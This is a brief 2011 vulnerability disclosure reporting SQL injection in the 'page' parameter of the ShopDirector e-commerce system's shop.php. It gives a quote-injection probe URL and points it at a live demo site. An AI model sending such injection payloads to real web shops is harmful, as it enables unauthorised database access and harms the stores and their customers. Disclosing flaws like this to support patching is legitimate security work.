# Exploit Title: ShopDirector (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.polyspaston.com/content_shopdirector.php
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Vulnerable Page:
shop.php

Example:
shop.php?c1=Cake&c2=Test%20cake&page=<SQL Injection Code>

Exploit:
shop.php?c1=Cake&c2=Test%20cake&page='1

Demo:
http://www.sd-demo.co.uk/shop/shop.php?c1=Cake&c2=Test%20cake&page='1


Thanks,


Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr